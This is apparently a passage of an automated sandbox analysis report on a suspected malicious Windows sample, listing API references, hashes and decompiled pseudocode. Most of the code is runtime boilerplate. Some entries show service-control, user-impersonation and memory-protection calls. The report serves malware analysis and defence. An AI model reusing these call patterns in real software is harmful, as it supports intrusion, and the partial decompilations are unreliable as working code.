                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,005B0223,?,?), ref: 005B0E19
                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,005B0223,?,?), ref: 005B0E1E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction ID: e6f0b986f79c47f2df78b5900a9022620743f9650b9358d5e1040a707868e860
                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction Fuzzy Hash: 0FD0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9080C770994046E5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 350 40e7ee-40e7f6 call 40e7c3 352 40e7fb-40e7ff ExitProcess 350->352
                                                                      C-Code - Quality: 100%
                                                                      			E0040E7EE(int _a4) {
                                                                      
                                                                      				E0040E7C3(_a4); // executed
                                                                      				ExitProcess(_a4);
                                                                      			}



                                                                      0x0040e7f6
                                                                      0x0040e7ff

                                                                      APIs
                                                                      • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                        • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                        • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                        • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                      • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                      • String ID:
                                                                      • API String ID: 2427264223-0
                                                                      • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                      • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                      • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                      • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 461 23999e8-2399a49 463 2399a4b-2399a55 461->463 464 2399a82-2399ad2 OpenServiceA 461->464 463->464 465 2399a57-2399a59 463->465 469 2399adb-2399b0c 464->469 470 2399ad4-2399ada 464->470 467 2399a5b-2399a65 465->467 468 2399a7c-2399a7f 465->468 471 2399a69-2399a78 467->471 472 2399a67 467->472 468->464 476 2399b1c 469->476 477 2399b0e-2399b12 469->477 470->469 471->471 474 2399a7a 471->474 472->471 474->468 477->476 478 2399b14 477->478 478->476
                                                                      APIs
                                                                      • OpenServiceA.ADVAPI32(?,?,?), ref: 02399AC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: c2ee00277bf20a024c1abf4106b8fc45c3333e118144e8e895a40942a0ee4f8b
                                                                      • Instruction ID: d017e582c3cbd8ca2db2c8961093438d74bf88c9895a7fbdccf666ef6f3c2737
                                                                      • Opcode Fuzzy Hash: c2ee00277bf20a024c1abf4106b8fc45c3333e118144e8e895a40942a0ee4f8b
                                                                      • Instruction Fuzzy Hash: 643166B0D002488FDF10CFAAC884B9EBBF1FF49704F14812AE815AB240D7789842CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 479 2399920-239996f 481 2399971-2399974 479->481 482 2399977-239997b 479->482 481->482 483 239997d-2399980 482->483 484 2399983-23999b2 OpenSCManagerW 482->484 483->484 485 23999bb-23999cf 484->485 486 23999b4-23999ba 484->486 486->485
                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 023999A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: 7d33c4903f89c8be39fcf30ab1dcc82d7e8b36e8bb4590039356aee5e8a66223
                                                                      • Instruction ID: 5a186ace8dca9033b271dbd35792ca74a362cece27c155fd906772e46ed30ee9
                                                                      • Opcode Fuzzy Hash: 7d33c4903f89c8be39fcf30ab1dcc82d7e8b36e8bb4590039356aee5e8a66223
                                                                      • Instruction Fuzzy Hash: 592135B5C002098FCF10CF9AD884BDEFBF5EF89314F14815AD808AB244D7749941CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 488 2399180-2399201 VirtualProtect 491 239920a-239922f 488->491 492 2399203-2399209 488->492 492->491
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 023991F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 27880ccc157b0d7cac1edf298c6e00d12b1a447d3d8feb9705ee292fcce63a6a
                                                                      • Instruction ID: 46a533f11d9973467803fc403bf71a572571a1ccc0e450aebf4d61e40929727c
                                                                      • Opcode Fuzzy Hash: 27880ccc157b0d7cac1edf298c6e00d12b1a447d3d8feb9705ee292fcce63a6a
                                                                      • Instruction Fuzzy Hash: 3E1113B5D002098BDB10CFAAC884A9FFBF5EF48314F14842ED429A7240C7799945CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 496 239a0e8-239a165 ControlService 498 239a16e-239a18f 496->498 499 239a167-239a16d 496->499 499->498
                                                                      APIs
                                                                      • ControlService.ADVAPI32(?,?,?), ref: 0239A158
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: ControlService
                                                                      • String ID:
                                                                      • API String ID: 253159669-0
                                                                      • Opcode ID: 6d156729e6d13c13f6411ff3ba453624fe62ad1a18f6a54aa26ba593b42e54f5
                                                                      • Instruction ID: b27f0750fd15baa5295d999e8b6afebaf900516c125c642c00e534328c914f80
                                                                      • Opcode Fuzzy Hash: 6d156729e6d13c13f6411ff3ba453624fe62ad1a18f6a54aa26ba593b42e54f5
                                                                      • Instruction Fuzzy Hash: A511E4B59002499FDB10CF9AC984BDEFBF4EB48314F10852AE458A7240D378A945CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 501 2399ed8-2399f44 ImpersonateLoggedOnUser 503 2399f4d-2399f6e 501->503 504 2399f46-2399f4c 501->504 504->503
                                                                      APIs
                                                                      • ImpersonateLoggedOnUser.KERNELBASE ref: 02399F37
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: ImpersonateLoggedUser
                                                                      • String ID:
                                                                      • API String ID: 2216092060-0
                                                                      • Opcode ID: da76f77a8dbe83d12486945799290eaff42a2ae45c3e5a4f4b6b6a4244395e04
                                                                      • Instruction ID: 2319aff203201e9af4f909d767c4868e3b9c55fe2dda4d4df299b329a917b7de
                                                                      • Opcode Fuzzy Hash: da76f77a8dbe83d12486945799290eaff42a2ae45c3e5a4f4b6b6a4244395e04
                                                                      • Instruction Fuzzy Hash: 171148B5900249CFDB10CF9AC984BDEFBF4EF48324F20845AD419A3240D378A945CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0040D534(intOrPtr _a4) {
                                                                      				void* _t6;
                                                                      
                                                                      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                      				 *0x4234b4 = _t6;
                                                                      				if(_t6 != 0) {
                                                                      					 *0x4250b0 = 1;
                                                                      					return 1;
                                                                      				} else {
                                                                      					return _t6;
                                                                      				}
                                                                      			}





                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateHeap
                                                                      • String ID:
                                                                      • API String ID: 10892065-0
                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 25%
                                                                      			E0040EA0A(intOrPtr _a4) {
                                                                      				void* __ebp;
                                                                      				void* _t2;
                                                                      				void* _t3;
                                                                      				void* _t4;
                                                                      				void* _t5;
                                                                      				void* _t8;
                                                                      
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(_a4);
                                                                      				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                      				return _t2;
                                                                      			}










                                                                      APIs
                                                                      • _doexit.LIBCMT ref: 0040EA16
                                                                        • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                      • String ID:
                                                                      • API String ID: 1597249276-0
                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                      • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                      • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 005B0929
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProcessTerminate
                                                                      • String ID:
                                                                      • API String ID: 560597551-0
                                                                      • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                      • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                                                                      • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                      • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367179672.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_88d000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6925b4d9788b6c10667373c33c0d1df5eb8838be6dc6342e433520d1c0a2f396
                                                                      • Instruction ID: adc6d067eb7b70a20ec05e9e0981ab5e10c09ff332f0544898331cd3ff33b20d
                                                                      • Opcode Fuzzy Hash: 6925b4d9788b6c10667373c33c0d1df5eb8838be6dc6342e433520d1c0a2f396
                                                                      • Instruction Fuzzy Hash: 6501D4715047489AE7209A2ADC80B67BFC8FF51328F18C51AEC459A2C2C2799845C7B2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367179672.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_88d000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 814c8d4ad28e822b71d6114ecd511e82e53c53926d020d7d7fb3df4e666f309e
                                                                      • Instruction ID: f3593e32338fa3782a143f026d162196e19e8ad19f1ed11f2a844c4a0cf62d72
                                                                      • Opcode Fuzzy Hash: 814c8d4ad28e822b71d6114ecd511e82e53c53926d020d7d7fb3df4e666f309e
                                                                      • Instruction Fuzzy Hash: 33F0AF71504344AAE7208E16CC84B62FB98EB52324F18C55AED485E282C3799C45CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 005C395B
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005C3970
                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 005C397B
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 005C3997
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 005C399E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                      • String ID:
                                                                      • API String ID: 2579439406-0
                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                      • Instruction ID: 22fba8d3c41ff612bd4aa68ddee945db432e49274acbb31115b19e3f1feb08e9
                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                      • Instruction Fuzzy Hash: 5F21D2B9A01204EFD720DFA4E94A7457FB0FB08356F804079E50D87662E7B86A82CF5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                      				intOrPtr _v0;
                                                                      				void* _v804;
                                                                      				intOrPtr _v808;
                                                                      				intOrPtr _v812;
                                                                      				intOrPtr _t6;
                                                                      				intOrPtr _t11;
                                                                      				intOrPtr _t12;
                                                                      				intOrPtr _t13;
                                                                      				long _t17;
                                                                      				intOrPtr _t21;
                                                                      				intOrPtr _t22;
                                                                      				intOrPtr _t25;
                                                                      				intOrPtr _t26;
                                                                      				intOrPtr _t27;
                                                                      				intOrPtr* _t31;
                                                                      				void* _t34;
                                                                      
                                                                      				_t27 = __esi;
                                                                      				_t26 = __edi;
                                                                      				_t25 = __edx;
                                                                      				_t22 = __ecx;
                                                                      				_t21 = __ebx;
                                                                      				_t6 = __eax;
                                                                      				_t34 = _t22 -  *0x422234; // 0x7c4c350d
                                                                      				if(_t34 == 0) {
                                                                      					asm("repe ret");
                                                                      				}
                                                                      				 *0x423b98 = _t6;
                                                                      				 *0x423b94 = _t22;
                                                                      				 *0x423b90 = _t25;
                                                                      				 *0x423b8c = _t21;
                                                                      				 *0x423b88 = _t27;
                                                                      				 *0x423b84 = _t26;
                                                                      				 *0x423bb0 = ss;
                                                                      				 *0x423ba4 = cs;
                                                                      				 *0x423b80 = ds;
                                                                      				 *0x423b7c = es;
                                                                      				 *0x423b78 = fs;
                                                                      				 *0x423b74 = gs;
                                                                      				asm("pushfd");
                                                                      				_pop( *0x423ba8);
                                                                      				 *0x423b9c =  *_t31;
                                                                      				 *0x423ba0 = _v0;
                                                                      				 *0x423bac =  &_a4;
                                                                      				 *0x423ae8 = 0x10001;
                                                                      				_t11 =  *0x423ba0; // 0x0
                                                                      				 *0x423a9c = _t11;
                                                                      				 *0x423a90 = 0xc0000409;
                                                                      				 *0x423a94 = 1;
                                                                      				_t12 =  *0x422234; // 0x7c4c350d
                                                                      				_v812 = _t12;
                                                                      				_t13 =  *0x422238; // 0x83b3caf2
                                                                      				_v808 = _t13;
                                                                      				 *0x423ae0 = IsDebuggerPresent();
                                                                      				_push(1);
                                                                      				E004138FC(_t14);
                                                                      				SetUnhandledExceptionFilter(0);
                                                                      				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                      				if( *0x423ae0 == 0) {
                                                                      					_push(1);
                                                                      					E004138FC(_t17);
                                                                      				}
                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                      			}




















                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                      • String ID:
                                                                      • API String ID: 2579439406-0
                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0040ADB0(intOrPtr* __ecx) {
                                                                      				void* _t5;
                                                                      				intOrPtr* _t11;
                                                                      
                                                                      				_t11 = __ecx;
                                                                      				_t5 =  *(__ecx + 8);
                                                                      				 *__ecx = 0x41eff0;
                                                                      				if(_t5 != 0) {
                                                                      					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                      				}
                                                                      				if( *(_t11 + 0xc) != 0) {
                                                                      					_t5 = GetProcessHeap();
                                                                      					if(_t5 != 0) {
                                                                      						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                      					}
                                                                      				}
                                                                      				return _t5;
                                                                      			}






                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                      • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                      • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                      • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                      • Instruction ID: f95322f5e4a5fc3ce7f63fc076719aa5c883553e75ce8ba48214bc128ce0e291
                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                      • Instruction Fuzzy Hash: 6A01AD76A006048FDF21DF64C805BEB37E9FB86316F4945A9D90A9B2C2E774B9418B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				int _v16;
                                                                      				int _v20;
                                                                      				intOrPtr _v24;
                                                                      				void* _v36;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t110;
                                                                      				intOrPtr _t112;
                                                                      				intOrPtr _t113;
                                                                      				short* _t115;
                                                                      				short* _t116;
                                                                      				char* _t120;
                                                                      				short* _t121;
                                                                      				short* _t123;
                                                                      				short* _t127;
                                                                      				int _t128;
                                                                      				short* _t141;
                                                                      				signed int _t144;
                                                                      				void* _t146;
                                                                      				short* _t147;
                                                                      				signed int _t150;
                                                                      				short* _t153;
                                                                      				char* _t157;
                                                                      				int _t160;
                                                                      				long _t162;
                                                                      				signed int _t174;
                                                                      				signed int _t178;
                                                                      				signed int _t179;
                                                                      				int _t182;
                                                                      				short* _t184;
                                                                      				signed int _t186;
                                                                      				signed int _t188;
                                                                      				short* _t189;
                                                                      				int _t191;
                                                                      				intOrPtr _t194;
                                                                      				int _t207;
                                                                      
                                                                      				_t110 =  *0x422234; // 0x7c4c350d
                                                                      				_v8 = _t110 ^ _t188;
                                                                      				_t184 = __ecx;
                                                                      				_t194 =  *0x423e7c; // 0x1
                                                                      				if(_t194 == 0) {
                                                                      					_t182 = 1;
                                                                      					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                      						_t162 = GetLastError();
                                                                      						__eflags = _t162 - 0x78;
                                                                      						if(_t162 == 0x78) {
                                                                      							 *0x423e7c = 2;
                                                                      						}
                                                                      					} else {
                                                                      						 *0x423e7c = 1;
                                                                      					}
                                                                      				}
                                                                      				if(_a16 <= 0) {
                                                                      					L13:
                                                                      					_t112 =  *0x423e7c; // 0x1
                                                                      					if(_t112 == 2 || _t112 == 0) {
                                                                      						_v16 = 0;
                                                                      						_v20 = 0;
                                                                      						__eflags = _a4;
                                                                      						if(_a4 == 0) {
                                                                      							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                      						}
                                                                      						__eflags = _a28;
                                                                      						if(_a28 == 0) {
                                                                      							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                      						}
                                                                      						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                      						_v24 = _t113;
                                                                      						__eflags = _t113 - 0xffffffff;
                                                                      						if(_t113 != 0xffffffff) {
                                                                      							__eflags = _t113 - _a28;
                                                                      							if(_t113 == _a28) {
                                                                      								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                      								L78:
                                                                      								__eflags = _v16;
                                                                      								if(__eflags != 0) {
                                                                      									_push(_v16);
                                                                      									E0040B6B5(0, _t182, _t184, __eflags);
                                                                      								}
                                                                      								_t115 = _v20;
                                                                      								__eflags = _t115;
                                                                      								if(_t115 != 0) {
                                                                      									__eflags = _a20 - _t115;
                                                                      									if(__eflags != 0) {
                                                                      										_push(_t115);
                                                                      										E0040B6B5(0, _t182, _t184, __eflags);
                                                                      									}
                                                                      								}
                                                                      								_t116 = _t184;
                                                                      								goto L84;
                                                                      							}
                                                                      							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                      							_t191 =  &(_t189[0xc]);
                                                                      							_v16 = _t120;
                                                                      							__eflags = _t120;
                                                                      							if(_t120 == 0) {
                                                                      								goto L58;
                                                                      							}
                                                                      							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                      							_v12 = _t121;
                                                                      							__eflags = _t121;
                                                                      							if(__eflags != 0) {
                                                                      								if(__eflags <= 0) {
                                                                      									L71:
                                                                      									_t182 = 0;
                                                                      									__eflags = 0;
                                                                      									L72:
                                                                      									__eflags = _t182;
                                                                      									if(_t182 == 0) {
                                                                      										goto L62;
                                                                      									}
                                                                      									E0040BA30(_t182, _t182, 0, _v12);
